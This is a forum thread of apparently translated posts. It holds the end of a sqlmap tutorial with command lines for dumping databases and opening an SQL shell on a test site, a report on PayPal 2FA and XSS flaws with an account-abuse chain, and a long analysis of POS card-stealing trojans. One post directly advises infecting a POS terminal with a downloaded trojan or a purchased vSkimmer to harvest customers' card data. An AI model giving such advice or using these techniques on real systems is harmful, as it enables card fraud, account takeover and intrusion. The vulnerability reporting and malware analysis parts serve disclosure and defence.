Please note, two hyphens. We add this option to the end of the command:Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –batch It remains to wait for the program to finish. She herself will inform you about the completion of the work, and provide the found material To get a list of databases - use the –dbs option.You can find out what exactly the program does and what methods it uses by reading the log of work.And since this is a blind injection, the utility will gradually, by letter, recognize the names of all bases. a great and illustrative example of working with blind injection. To do it manually, you would have quit in the second minute of work. When working with other resources, the utility can stop its work, reporting the expired timeout: “connection timed out to the target URL”. With this, your target will work and open quietly in the browser. The problem is that some resources recognize the SQLmap and disconnect with it. To avoid this problem, I advise you to use the –random-agent function. Thus, we disguise ourselves and continue working:Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –random-agent –dbsOk, we've got a list of all databases, and now we need to get their contents. Our proud -dbs turns into a simple -D, after which we enter the name of the database we are interested in. In my case, this is mysql. To get the tables, add –tables to the very end.Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –random-agent -D mysql –tables –batchSince this is a blind injection, we also have to wait for all the data to be received. Yes, for a long time, but how else? The utility found a lot of tables. To get the columns, we use the same system as with obtaining tables, only change –tables to -T, enter the required tables and then add –columns :Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –random-agent -D mysql -T proc –columns –batchYes, we have to wait again. It was necessary to study in advance the insides of the target for the article. It takes only a couple of seconds for you, and I'm sitting here with tea, I've been waiting for an hour.I've been waiting for the fifth hour, so I just scored and left to work with another database of logs. Everything is the same, only the names of the bases and tables are different:Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –random-agent -D logs -T logs –columns –batch Finally! We got a list of columns. Now, to get their contents, we do the following: –columns evolves (or degrades, as it is more convenient for anyone) into -C, enter the columns / columns we are interested in separated by commas and add the –dump key to the end. Python: Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –random-agent -D logs -T logs -C IP, useragent –dump –batch After that, the program starts merging data: I will have to wait a very long time to show the finished result, so I'll show you how the dump will look in someone else's example: The problem is the time it will take for the blind injection.In principle, that's all. But specifically, as an addition, I will show a couple of chips. For example, how about the server executing our commands? for this we need to create a wrapper. For this we will use the –sql-shell command: Python: Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/artist.php?id=test –sql-shell It does not always work, but if we are successful, we get full access, and we can even add our own users. For example, let's try to get the user with the SELECT user () command. To execute this command, we just need to write it directly into the command line. SQLmap has already created a wrapper and is ready to send our commands for execution. Let's try: Voala. I will not explain the usefulness of this function, it seems obvious to me. And to get out of this mode - enter x or q. If you want to use CMD, it is easier to do it in Netsparker if there is a similar vulnerability.In addition, I am obliged to tell you how to attack the vulnerability if the data is transmitted by the POST parameter. If in Netsparker you see a message that this is a POST SQL Injection, then by clicking on it in the sparker, in the working window find the name of the variable being passed (TYPE) and its value (VALUE), then simply substitute these values into sqlmap:Python27 \ Python.exe SQLmap \ sqlmap.py -u Netsparker Test Web Site - PHP –data “username = admin, password = admin123456”, then everything is the same.You can also use Burp Suite to parse POST injections. You can do without this program, but more on that later, but this tool is very interesting and we must put in at least a word for it. After installation and launch, we will be asked to select a project. We will not create anything, and therefore we will select a temporary one and click further: We will use the default settings for this project, the standard ones: Click on start and wait for the program to open Immediately after opening the program, we go to the proxy settings menu: Now I will immediately show you how to add your own, but we will add a little specific. Click on the Add button. After that, set up everything like mine and click OK: We will use our new proxy. To do this, go to the browser settings. Since I use Firefox (and I advise you), then the proxy setting is in my "Network Settings" We manually configure the proxies that we introduced in Burp Suite.Before accepting the settings, open the login data entry form separately: http://php.testsparker.com/auth/internal.php. After that, we accept the settings, enter the data and click on the login button. The page will load, but we do not need this process, but the data that is in Burp Suit'e: We only need one line. Input line: username = admin + & password = admin123456 & token = 11940to work with this data in SQLmap, we will use the –data option: Python: Python27 \ Python.exe SQLmap \ sqlmap.py -u http://php.testsparker.com/auth/internal.php –random-agent –data “username = admin + & password = admin123456 & token = 11940” - dbs –batch In our case, the injection failed. However, I explained how to use POST in SQLmap to attack.As I promised, I will tell you how to catch POST immediately in the browser. for this we need to open the page where we will enter the login and password, and open the console with the F12 key. Next, we need to open the Network tab and check the Continuous logs item After that, we enter the data on the site and start looking for our POST request in the logs. To get the data we need - click on the request we need and in the menu on the right, select the “parameters” tab. In the parameters there is an item "payload", which contains the string we need.My task is to consider the main functions, and separately and completely the SQLmap utility needs to be disassembled and considered in a new, separate article. This article is already painfully long and loaded. I think I'll analyze it in a future article as well as Netsparker in this one.The article has come to an end. I will not hide, most of the effort went to Netsparker. The reason for this is the lack of such material in Russian. There are short descriptions, but no full analysis. I decided to change the situation by writing a full analysis of the functions of this product. The fact is that on the same SQLmap you will find hundreds, if not thousands of articles and full analyzes of all functions, commands, and even examples of successful attacks. But you will hardly find a complete analysis of Netsparker.On my own behalf, I want to add that professionals reading this material do not throw rotten tomatoes at me. I really tried.Good luck. Take care of yourself, do not break the law and remember that you can scan other people's resources only with the permission of their owners. Nevertheless, the utilities described by us will allow you to conduct an excellent pen test of even the most complex application.(c) cybersec.org
  5. Vulnerabilities we discoveredIn our analysis of PayPal’s mobile apps and website UI, we were able to uncover a series of significant issues. We’ll explain these vulnerabilities from the most severe to least severe, as well as how each vulnerability can lead to serious issues for the end user.#1 Bypassing PayPal’s two-factor authentication (2FA)Using the current version of PayPal for Android (v. 7.16.1), the CyberNews research team was able to bypass PayPal’s phone or email verification, which for ease of terminology we can call two-factor authentication (2FA). Their 2FA, which is called “Authflow” on PayPal, is normally triggered when a user logs into their account from a new device, location or IP address. How we did itIn order to bypass PayPal’s 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy. Then, through a series of steps, the researcher was able to get an elevated token to enter the account. (Since the vulnerability hasn’t been patched yet, we can’t go into detail of how it was done.) The process is very simple, and only takes seconds or minutes. This means that attackers can gain easy access to accounts, rendering PayPal’s lauded security system useless.What’s the worst case scenario here?Stolen PayPal credentials can go for just $xx.xx on the black market. Essentially, it’s exactly because it’s so difficult to get into people’s PayPal accounts with stolen credentials that these stolen credentials are so cheap. PayPal’s authflow is set up to detect and block suspicious login attempts, usually related to a new device or IP, besides other suspicious actions.But with our 2FA bypass, that security measure is null and void. Hackers can buy stolen credentials in bulk, log in with those credentials, bypass 2FA in minutes, and have complete access to those accounts. With many known and unknown stolen credentials on the market, this is potentially a huge loss for many PayPal customers.PayPal’s responseWe’ll assume that HackerOne’s response is representative of PayPal’s response. For this issue, PayPal decided that, since the user’s account must already be compromised for this attack to work, “there does not appear to be any security implications as a direct result of this behavior.” Based on that, they closed the issue as Not Applicable, costing us 5 reputation points in the process.#2 Phone verification without OTPOur analysts discovered that it’s pretty easy to confirm a new phone without an OTP (One-Time Pin). PayPal recently introduced a new system where it checks whether a phone number is registered under the same name as the account holder. If not, it rejects the phone number.How we did itWhen a user registers a new phone number, an onboard call is made to api-m.paypal.com, which sends the status of the phone confirmation. We can easily change this call, and PayPal will then register the phone as confirmed. The call can be repeated on already registered accounts to verify the phone.What’s the worst case scenario here?Scammers can find lots of uses for this vulnerability, but the major implication is unmissable. By bypassing this phone verification, it will make it much easier for scammers to create fraudulent accounts, especially since there’s no need to receive an SMS verification code.PayPal’s responseInitially, the PayPal team via HackerOne took this issue more seriously. However, after a few exchanges, they stopped responding to our queries, and recently PayPal itself (not the HackerOne staff) locked this report, meaning that we aren’t able to comment any longer. #3 Sending money security bypassPayPal has set up certain security measures in order to help avoid fraud and other malicious actions on the tool. One of these is a security measure that’s triggered when one of the following conditions, or a combination of these, is met: You’re using a new device You’re trying to send payments from a different location or IP address There’s a change in your usual sending pattern The owning account is not “aged” well (meaning that it’s pretty new) When these conditions are met, PayPal may throw up a few types of errors to the users, including: “You’ll need to link a new payment method to send the money” “Your payment was denied, please try again later” How we did itOur analysts found that PayPal’s sending money security block is vulnerable to brute force attacks.What’s the worst case scenario here?This is similar in impact to Vulnerability #1 mentioned above. An attacker with access to stolen PayPal credentials can access these accounts after easily bypassing PayPal’s security measure.PayPal’s responseWhen we submitted this to HackerOne, they responded that this is an “out-of-scope” issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process.#4 Full name changeBy default, PayPal allows users to only change 1-2 letters of their name once (usually because of typos). After that, the option to update your name disappears.However, using the current version of PayPal.com, the CyberNews research team was able to change a test account’s name from “Tester IAmTester” to “christin christina”. How we did itWe discovered that if we capture the requests and repeat it every time by changing 1-2 letters at a time, we are able to fully change account names to something completely different, without any verification.We also discovered that we can use any unicode symbols, including emojis, in the name field.What’s the worst case scenario here?An attacker, armed with stolen PayPal credentials, can change the account holder’s name. Once they’ve completely taken over an account, the real account holder wouldn’t be able to claim that account, since the name has been changed and their official documents would be of no assistance.PayPal’s responseThis issue was deemed a Duplicate by PayPal, since it had been apparently discovered by another researcher.#5 The self-help SmartChat stored XSS vulnerabilityPayPal’s self-help chat, which it calls SmartChat, lets users find answers to the most common questions. Our research discovered that this SmartChat integration is missing crucial form validation that checks the text that a person writes. How we did itBecause the validation is done at the front end, we were able to use a man in the middle (MITM) proxy to capture the traffic that was going to Paypal servers and attach our malicious payload.What’s the worst case scenario here?Anyone can write malicious code into the chatbox and PayPal’s system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.With that, the scammer can log into their account, pretend to be a customer support agent, and get sensitive information from PayPal users.PayPal’s responseThe same day that we informed PayPal of this issue, they replied that since it isn’t “exploitable externally,” it is a non-issue. However, while we planned to send them a full POC (proof of concept), PayPal seems to have removed the file on which the exploit was based. This indicates that they were not honest with us and patched the problem quietly themselves, providing us with no credit, thanks, or bounty. Instead, they closed this as Not Applicable, costing us another 5 points in the process.#6 Security questions persistent XSSThis vulnerability is similar to the one above (#5), since PayPal does not sanitize its Security Questions input.How we did itBecause PayPal’s Security Questions input box is not validated properly, we were able to use the MITM method described above.Here is a screenshot that shows our test code being injected to the account after refresh, resulting in a massive clickable link: What’s the worst case scenario here?Attackers can inject scripts to other people’s accounts to grab sensitive data. By using Vulnerability #1 and logging in to a user’s account, a scammer can inject code that can later run on any computer once a victim logs into their account.This includes: Showing a fake pop up that could say “Download the new PayPal app” which could actually be malware. Changing the text user is adding. For example, the scammer can alter the email where the money is being sent. Keylogging credit card information when the user inputs it. There are many more ways to use this vulnerability and, like all of these exploits, it’s only limited by the scammer’s imagination.PayPal’s responseThe same day we reported this issue, PayPal responded that it had already been reported. Also on the same day, the vulnerability seems to have been patched on PayPal’s side. They deemed this issue a Duplicate, and we lost another 5 points.PayPal’s reputation for dishonestyPayPal has been on the receiving end of criticism for not honoring its own bug bounty program.Most ethical hackers will remember the 2013 case of Robert Kugler, the 17-year old German student who was shafted out of a huge bounty after he discovered a critical bug on PayPal’s site. Kugler notified PayPal of the vulnerability on May 19, but apparently PayPal told him that because he was under 18, he was ineligible for the Bug Bounty Program.But according to PayPal, the bug had already been discovered by someone else, but they also admitted that the young hacker was just too young.Another researcher earlier discovered that attempting to communicate serious vulnerabilities in PayPal’s software led to long delays. At the end, and frustrated, the researcher promises to never waste his time with PayPal again.There’s also the case of another teenager, Joshua Rogers, also 17 at the time, who said that he was able to easily bypass PayPal’s 2FA. He went on to state, however, that PayPal didn’t respond after multiple attempts at communicating the issue with them.PayPal acknowledged and downplayed the vulnerability, later patching it, without offering any thanks to Rogers.The big problem with HackerOneHackerOne is often hailed as a godsend for ethical hackers, allowing companies to get novel ways to patch up their tools, and allowing hackers to get paid for finding those vulnerabilities.It’s certainly the most popular, especially since big names like PayPal work exclusively with the platform. There have been issues with HackerOne’s response, including the huge scandal involving Valve, when a researcher was banned from HackerOne after trying to report a Steam zero-day.However, its Triage system, which is often seen as an innovation, actually has a serious problem. The way that HackerOne’s triage system works is simple: instead of bothering the vendor (HackerOne’s customer) with each reported vulnerability, they’ve set up a system where HackerOne Security Analysts will quickly check and categorize each reported issue and escalate or close the issues as needed. This is similar to the triage system in hospitals.These Security Analysts are able to identify the problem, try to replicate it, and communicate with the vendor to work on a fix. However, there’s one big flaw here: these Security Analysts are also active Bug Bounty Hackers.Essentially, these Security Analysts get first dibs on reported vulnerabilities. They have full discretion on the type of severity of the issue, and they have the power to escalate, delay or close the issue.That presents a huge opportunity for them, if they act in bad faith. Other criticisms have pointed out that Security Analysts can first delay the reported vulnerability, report it themselves on a different bug bounty platform, collect the bounty (without disclosing it of course), and then closing the reported issue as Not Applicable, or perhaps Duplicate.As such, the system is ripe for abuse, especially since Security Analysts on HackerOne use generic usernames, meaning that there’s no real way of knowing what they are doing on other bug bounty platforms.What it all meansAll in all, the exact “Who is to blame” question is left unanswered at this point, because it is overshadowed by another bigger question: why are these services so irresponsible?Let’s point out a simple combination of vulnerabilities that any malicious actor can use: Buy PayPal accounts on the black market for pennies on the dollar. (On this .onion website, you can buy a $5,000 PayPal account for just $150, giving you a 3,333% ROI.) Use Vulnerability #1 to bypass the two-factor authentication easily. Use Vulnerability #3 to bypass the sending money security and easily send money from the linked bank accounts and cards. Alternatively, the scammer can use Vulnerability #1 to bypass 2FA and then use Vulnerability #4 to change the account holder’s name. That way, the scammer can lock the original owner out of their own account.While these are just two simple ways to use our discovered vulnerabilities, scammers – who have much more motivation and creativity for maliciousness (as well as a penchant for scalable attacks) – will most likely have many more ways to use these exploits.And yet, to PayPal and HackerOne, these are non-issues. Even worse, it seems that you’ll just get punished for reporting it.
  6. Hello, this is a very interesting and relevant topic for successful work.To get data from your pos terminal, you can use the following methods:1. Download a free topical virus from a virus storage site and infect your pos terminal. Configure and study the transfer of customer data from your device to a computer or mobile phone. Sites where you can download Trojan viruses are listed in the next topic.2. Buy a working vSkimmer and install it in your post terminal. Set up data transfer to your device.Some additional information:POS terminal infection Infection of POS terminals (Point Of Sale - point of sale), hardware and software systems for trading or automated workstations of a cashier is a cybercriminal activity aimed at stealing bank card data and further withdrawing funds.Classification of methods of infecting POS terminalsMalicious programs for POS terminals can be distinguished by the volume of tasks being solved and the nature of the information stolen.RAM scrapersWriting the contents of RAM is a mandatory part of almost all programs for infecting POS terminals, since during a transaction all data from a bank card is processed in RAM. Basic RAM scrapers record information from memory and send it to the attacker's server for further offline analysis, while more advanced versions are able to independently extract data from the magnetic stripes of bank cards from the general stream.RAM scraper and keyloggerSuch programs, in addition to analyzing the RAM, also record all keystrokes, fixing PIN codes and other entered information. Since all transactions are carried out via a computer or mobile device, the development of malicious code often does not take place from scratch: cybercriminals modify already created Trojans and viruses by adding RAM scrapers to them to steal data from bank cards. Accordingly, such instances may contain rootkits to hide traces of activity or backdoors for remote access, and steal other information. In particular, the well-known malicious agent vSkimmer collects information about the operating system used, users, and GUID.Object of influenceWhen it comes to infecting POS terminals, malware is not injected into the card reader, but into the computer or mobile device that controls it. Although all transmitted transaction data is encrypted, the information from the magnetic stripe of the card arrives in unencrypted form and is already encrypted on the computer. Evolution of POS malwareThis vulnerability is used by criminals. The programs for scanning the RAM, embedded in the system, constantly analyze the contents of the latter and read the card data. The number, expiration date, owner's name, PIN-code, CVV and CVC recorded on the magnetic stripe are sufficient to make a clone with which you can withdraw money and pay for purchases. In addition, this data allows you to pay for online orders where the presentation of physical cards is not required. Chip cards are better protected: they encrypt payment information with a chip before being sent to the POS terminal, and intercepting it is useless. However, the magnetic stripe is also there, and its data can still be copied. In this case, the criminal will not be able to withdraw money from the ATM (there is no chip), but he will be able to use the clone as a means of payment if the reader in the store works only with a strip. However, in this case, traces remain for law enforcement agencies, and therefore criminals prefer to copy cards without chips.Sources of threatA POS terminal can be infected with malware in several ways: via the Internet using exploits, via a USB interface to which an infected medium is connected, by replacing a secure POS terminal with an infected one, via spam with a Trojan downloader. A program that steals passwords can be entered into the system on purpose. Bank data is of great value, and an unscrupulous or offended employee, having agreed with a cybercriminal, will easily introduce a malicious agent into the system. The third major source of threat is companies that install and remotely service POS terminals. In theory, in such firms, the security system should be organized at the highest level, but in practice this is not always true. There are known cases when, having cracked the password of the remote administrator of POS terminals, attackers at once gained access to the banking data of millions of users.Threat analysisFor a simple bank card holder, the main danger of POS-terminals being infected is that he is not able to prevent it. A person uses the card, assuming normal operation of the system, but if it performs unauthorized operations, then the user will not be able to find out about it. To reduce the risk, you can abandon the card, which contains only a magnetic stripe, in favor of a more secure chip one and regularly monitor the status of your accounts, track all transactions in order to immediately take action if any suspicions arise. If we talk about the owners of POS terminals, then from their point of view there are no direct losses: after all, the data is stolen not from the company, but from the cardholders. However, reputational losses and customer outflow can result in millions of damage, and therefore any company must take the necessary measures to protect the banking data of its customers.All POS computers must be equipped with effective antivirus software, and the system software must be up to date. The list of installed programs itself should be limited, and the computer should not be used for other tasks not related to transactions. The same applies to the owners of mobile POS terminals. For such purposes, it is better to purchase a second smartphone, using it only to transfer money, and communicate, take selfies and other photos, launch media files - on another device. Access to POS-terminals, authorization on them should be allowed only to those employees who directly work with them. Within the system, a clear delineation of rights is required with the prohibition to install or modify computer software for unprivileged accounts. Each user must have their own complex password.Finally, in addition to working with the terminal, cashiers and other tellers should be trained in information security rules. As already mentioned, the methods of distributing malicious programs for trading devices do not differ from the methods of infecting other computers, and in many cases the penetration of Trojan horses and viruses is due to the carelessness and frivolity of users; compliance with cyber hygiene greatly complicates the activities of intruders.Trojan.MWZLesson - a Trojan for POS terminalsFor many years, POS terminals have remained a tasty morsel for virus writers, since they are used by numerous merchants around the world to make payments using bank plastic cards. Doctor Web's specialists examined another Trojan capable of infecting payment terminals, which turned out to be a modification of another malicious program well known to our virus analysts.A POS Trojan added to the Dr.Web virus databases under the name Trojan.MWZLesson, after its launch, registers itself in the branch of the system registry responsible for starting applications. Its architecture includes a module that scans the RAM of the infected device for the presence of bank card tracks in it. The cybercriminals borrowed this code from another malicious program designed to infect POS terminals known as Trojan.PWS.Dexter. The Trojan transfers the detected tracks and other intercepted data to the command and control server.Trojan.MWZLesson can intercept GET and POST requests sent from an infected machine by Mozilla Firefox, Google Chrome or Microsoft Internet Explorer - the Trojan duplicates these requests to the command and control server belonging to the attackers. In addition, this malware can execute the following commands: CMD - transfers the received directive to the CMD command interpreter; LOADER - downloads and runs the file (dll - using the regsrv utility, vbs - using the wscript utility, exe - the direct launch is performed); UPDATE - update command; rate - sets the time interval of communication sessions with the management server; FIND - search for documents by mask; DDOS - start a DDoS attack using the http flood method. Trojan.MWZLesson exchanges data with the control center via the HTTP protocol, while the packets that the Trojan sends to the remote server are not encrypted, but the malware uses a special cookie parameter in them, in the absence of which the C&C server ignores requests from the Trojan.While studying the internal architecture of Trojan.MWZLesson, virus analysts from Doctor Web came to the conclusion that they were familiar with this Trojan, since they had encountered part of its code earlier in another malicious program. It turned out to be BackDoor.Neutrino.50, a truncated and shortened version of which, in fact, is Trojan.MWZLesson.BackDoor.Neutrino.50 is a multifunctional backdoor that uses exploits for the CVE-2012-0158 vulnerability during its distribution. Cases of downloading this malicious program from various sites hacked by cybercriminals have been recorded. When BackDoor.Neutrino.50 islaunched, itchecks for the presence of virtual machines in its environment, if any, the Trojan displays an error message "An unknown error occurred. Error - (0x [random number])", after which BackDoor.Neutrino.50 deletes itself from the system.In addition to the functions of a Trojan for POS terminals, this backdoor has the ability to steal information from Microsoft's mail client, as well as credentials for accessing resources via FTP using a number of popular ftp clients. In addition to directives typical for Trojan.MWZLesson, the BackDoor.Neutrino.50 Trojan can execute other commands, in particular, it is capable of carrying out several types of DDoS attacks, deleting some other malicious programs running on the infected machine, and can also try to infect computers. available on the local network.The signatures of these Trojans have been added to the Dr.Web virus databases, so they pose no threat to users of our anti-virus products.Experts have identified several new malware samples for POS terminalsThe pre-holiday season has come, the number of purchases has increased, and with it the risk of running into an unsafe PoS terminal has grown. Experts report the detection of several samples of malware that infects payment device systems. Experts generally called the ModPOS virus one of the most complex in its class.The specialists of iSight Partners, who discovered ModPOS, called the malware "PoS malware on steroids" and one of the most difficult representatives of the "genre". And this is the opinion of a company that has been analyzing this kind of malware for over eight years! According to iSight Partners, in a massive campaign aimed at undisclosed major US retailers, ModPOS stole several million dollars from credit and debit cards.The malware has remained out of sight of virus analysts since 2013. It is almost impossible to find references to this malware even on hacker forums.It took the iSight Partners team more than three weeks to reverse engineer the program, and only after that they were able to get to the three ModPOS kernel modules. For comparison, recently it took their colleagues about half an hour to "open" the Cherry Picker PoS malware . ISight Partners writes that "an incredibly talented author did a great job" creating ModPOS. The company believes that the author of the virus is a resident of Eastern Europe. The experts also report that it took "a lot of time and money" to develop each of the ModPOS kernel modules. Each of the modules behaves like a rootkit, which further complicates their analysis and reverse engineering.To communicate with C&C servers, the malware uses 128- and 256-bit encryption and requests a unique key for each client. Because of this, it is almost impossible to understand what data was stolen. Other PoS malware typically transmits information in clear text without resorting to encryption.A less complex, but very insidious representative of the PoS malware family was discovered by specialists from InfoArmor. The virus, dubbed Pro PoS, weighs only 76 KB. Oddly enough, this volume was enough to accommodate the functions of a rootkit and outwit virus analysts. The virus is also supposedly created by East European hackers (see screenshot below).Pro PoS uses a polymorphic engine, that is, each malware build has a new signature. This avoids detection and overcomes security systems. InfoArmor experts warn that at the moment Pro PoS is actively used to attack major Canadian and American retail chains. Pro PoS received its last update on November 27, 2015, and its price increased at the same time. Today, a six-month malware license costs $ 2,600.New threats for old PoS terminalsIt would seem that not so long ago the world learned about threats specially designed for unusual computers filled with real money - ATMs. Several years have passed, and the ranks of "unusual computers" have replenished with new devices for trading and accepting payment cards - PoS terminals (point of sales, point of sale).2013 was marked by an incident that affected US residents: the data of more than 40 million bank cards and information on more than 70 million customers of a large retail chain Target fell into the hands of cybercriminals. During the investigation, it turned out that the cause of the incident was not the compromise of the payment processing system or the company's servers, but the infected cash registers and PoS terminals. Malicious software installed on them by cybercriminals intercepted payment data in the device's RAM in plain text. In 2014, the situation with terminals was repeated in another retail chain, Home Depot, and led to data leaks from 56 million cards.These incidents have shown that cybercriminals are not only closely monitoring the trends in technology and devices for receiving and processing payments, but also continuously developing specialized malicious software to steal valuable financial data.Before large-scale retail hacks, the problem of malware for PoS terminals was not so much ignored as it simply did not attract public and media attention, despite the fact that PoS malware has attacked various enterprises since at least 2010. For example, back in 2010, the world learned about Trojan-Spy.Win32.POS (also known as CardStealer), which looked for payment card details on an infected workstation and transmitted the found information to the cybercriminals' server. Since then, antivirus experts have discovered more and more instances of malware designed to steal payment data from PoS terminals every year. Timeline of threat detection for PoS terminals (source: Kaspersky Lab)Currently, the infection of PoS terminals has already gone beyond pinpoint attacks, and cybercriminals have received a new foothold for the implementation of threats, which allows them to get closest to other people's money.General purpose OS against specific malwareThe life of attackers is somewhat simplified by the fact that PoS devices are actually ordinary computers that can also be used (and are sometimes used, especially in small businesses) for "general purposes", including surfing the Net and checking email. This means that in some cases criminals can gain remote access to such devices.The Dexter malware, discovered in 2012, stole bank card details by attacking POS terminals running Windows. It infiltrated the iexplore.exe system process, read the RAM and looked for payment data sufficient to make a fake plastic card (owner's name, account number, expiration date and card number, including the issuer code, class and type of card, and so on), then sent the collected information to a remote server controlled by the attackers. Examples of commands that Dexter received from the command and control serverDuring its existence, Dexter has managed to hit hundreds of PoS systems in well-known retail chains, hotels, restaurants, as well as in private parking lots. And as you might guess, most of the victims' workstations were running the Windows XP operating system.Another notorious example is the threat dubbed Backoff. This PoS Trojan is designed to steal card information from payment terminals. Like Dexter, this malware reads the RAM of a PoS terminal to obtain payment card details. In addition, some versions of Backoff contained a component for intercepting keyboard input (keylogger), presumably in case it ends up not on a PoS terminal, but on a regular workstation, which can also be used for payments (which means that the user will enter valuable information from the keyboard).Points of sale in "non-trade" placesCurrently, PoS devices can wait for their users not only in retail chains, supermarkets or hotels. Parks and streets are full of parking payment terminals for all kinds of vehicles and cozy "booths" for fast recharging of a mobile device. Airports and train stations offer help information and pay for tickets through various devices. In cinemas, there are terminals for buying and booking tickets for film shows. In clinics and government agencies, visitors are greeted with electronic queues and receipt printing devices. In some places, even toilets are equipped with payment terminals!At the same time, not all of these devices are sufficiently well protected. For example, in the summer of 2014, experts from an antivirus company discovered configuration flaws in parking terminals that allowed them to compromise devices and, as a result, user data (including payment).The application for parking meters operating on the basis of the operating system of the Windows family allows the user to register and get help information about the location of the parking meter and other bicycle parking lots. The display of all this, as well as bars, cafes and other objects, is implemented using the Google widget. The user does not have the ability to minimize the full-screen application and go beyond it, however, it is precisely in it that lies the configuration flaw that allows you to compromise the device: in the lower right corner of the widget there are links "Report a bug", "Privacy" and "Terms of use", after clicking on which will launch the Internet Explorer browser. An example of exploiting vulnerabilities in a parking meter applicationThe use cases for such configuration flaws depend only on the imagination of the attacker. For example, an attacker can extract an administrator password stored in clear text in memory. You can also get a snapshot of the bike parking app's memory. It may then be possible to extract the personal information of its users from it: name, e-mail address and phone number - such a database of verified addresses and phone numbers will be of particular value on the black market of cybercriminals. An attacker can also install a keylogger that intercepts all the entered data and sends it to a remote server, or, by adding fields for entering additional data, implement an attack scenario that will result in the receipt of even more personal data.Default denyFinancial institutions and organizations operating PoS terminals should pay more attention to protecting their devices, and not only the security of their hardware, but also the security of their operating systems, as well as the entire network information infrastructure. This will be helped by means of protection that have long been used in corporate networks, and specialized solutions for ensuring the security of embedded systems.Point of sale equipment is no less valuable to the owner than a lone ATM in a shopping center for the owner bank. And if the owners of ATMs with each new incident understand better that it is necessary to protect devices, then many owners of PoS terminals still pay for their carelessness. Deny by default and full disk encryption are not innovative methods, but they are still effective at protecting the iron bag of money.Analyzing malware created for POS terminalsThe malware authors do not stand still, but constantly invent new schemes to replenish their wallets. In this article, we will look at a new trend in the field of virus writing - malware for POS terminals.What is a POS terminal?POS is translated as point of sale, that is, the place where the client pays for goods or services. POS terminals represent a wide class of devices, and its implementation depends only on the imagination of manufacturers. For example, there are POS terminals based on the iPad. So far, virus writers for POS terminals have mastered only one platform - Windows, so this article will focus on malware specifically for that platform.Why are POS terminals interesting to cybercriminals? The answer is simple - acquiring, that is, payment by credit card. Despite the fact that the data security standards of the payment card industry prohibit the storage of complete card data after a successful transaction, virus writers have still found a way to get their hands on it. The fact is that in order to authorize the purchase, the POS terminal must somehow contact the processing center, and all this time the card data is in the memory of the POS terminal. This is what the attackers decided to take advantage of. Once again, I repeat that there are a lot of POS terminal implementations and this attack will not be successful on all devices.Attackers are interested in track1 and track2 - data recorded on magnetic tape. This data contains the owner's name, card code, expiration date and other intimate information. Having track1 / track2 is enough to make a clone of a plastic card.DexterIn December 2012, the Israeli company Seculert announced a new malware it had detected on hundreds of POS systems around the world. One of the interesting details is that over 30% of server versions of Windows were found among the infected systems. The company provides a cloud service that helps identify malicious activity on an enterprise's network by analyzing log files generated by various software or hardware proxies (Blue Coat, Squid, and others). Unsurprisingly, she was the first to spot this threat .Consider the files whose hashes were published by Seculert. The files are packed with a fairly popular cryptor, which uses the XPXAXCXK signature during the decompression process. This cryptor is widely used to hide from signature detection. And therefore, it is also well studied, a static unpacker has even been written for it .However, to unpack it manually, it is enough to set a breakpoint on the VirtualAlloc WinAPI functions and trace the code until the unpacked PE file is found in one of the allocated memory regions.After removing the cryptor, we find that three of the four files are completely identical. The size of the first variant is only 24 KB, the file was compiled using Visual Studio, the compilation date is August 30, 2012, according to the data from the PE header. The second, more recent version was compiled on October 16, 2012, and its size is 44 KB.Now closer to the functionality itself. The first thing Dexter does is try to inject its body and create a thread in the Internet Explorer process. Next, the malware copies itself to% APPDATA% using a random name, and is also registered in the registry key for startup. Dexter launches its own threads, which are responsible for keeping the autorun key in the registry, searching for data and injecting it into the IE process. Finally, control is passed to the code that establishes the connection and sends the collected data to the server.To communicate with the server, Dexter uses the HTTP protocol, data is transmitted using a POST request. Before sending data to the server, Dexter encrypts it using the XOR operation and base64 algorithm. The following information is sent to the server: page - bot identifier; ump - collected track data; unm - username; cnm - computer name; query - operating system version; spec - "bitness" of the operating system (32 vs 64); opt is the time elapsed from the previous user input of information. Retrieved using the GetLastInputInfo WinAPI function; view - a list of all processes running on the infected system; var is a unique string for each build; val is a random string, used as a decryption key. The server sends a response to this POST request, the header of which contains a cookie with a command to execute for the client. The command is encrypted with the same algorithm as the request. An early version of Dexter only supports two commands: checkin - setting the delay period between requests to the server; scanin - sets the delay period between attempts to find track data in memory. In a later version, three more were added to these two commands: update - update from the specified URL; uninstall - remove yourself from the infected computer; download - download and launch a file from the URL specified in the command. In general, Dexter has a classic set of functionality for a Trojan. The only thing that makes it unique among many similar malware is its focus on stealing plastic card data. The search for track2 goes in the following sequence: A list of processes is compiled. System and 64-bit processes are excluded from the list. The WinAPI function VirtualQueryEx checks the availability of memory regions. An attempt is made to read memory from available regions using the ReadProcessMemory WinAPI function. The read buffer is searched for the = symbol, and it is also checked that there is a string of a certain length, consisting of digits, to the right and left of the symbol. The ability to store a string in both ANSI and Unicode is taken into account. The numbers to the left of the = symbol are checked using the Luna algorithm. If the check is passed, the data is copied into a special buffer, from where it will later be sent to the server. After a certain period, all steps are repeated, this period can be set by a command from the server. A later version of Dexter searches for track1 using a similar algorithm.vSkimmerThis malware is considered to be a follower of Dexter. VSkimmer added a simple anti-debug, executed using standard WinAPI functions, and writing its own process to trusted Windows firewall processes. VSkimmer searches for processes using approximately the same algorithm as Dexter, but the author did not reinvent the wheel and used regular expressions to search.However, among other things, vSkimmer also has interesting functionality. Obviously, the main difficulty for cybercriminals is to infect the computer that is used in the POS terminal. From such a computer, they usually do not go to sites, and sometimes there is no Internet at all on it. In this case, you can infect your computer with the help of an insider in your organization. This is the mode of operation that was added to vSkimmer. If the infected computer does not have an Internet connection, the malware writes all the accumulated data to a special file. When a USB drive with a volume label KARTOXA007 is connected to the computer, vSkimmer copies all the collected information to the drive into the dmpz.log file.The author of this malware has a good sense of humor - apparently, this can explain that the PCICompliant / 3.33 value is used as the User-Agent when connecting to the server. PCI Compliant is the name given to 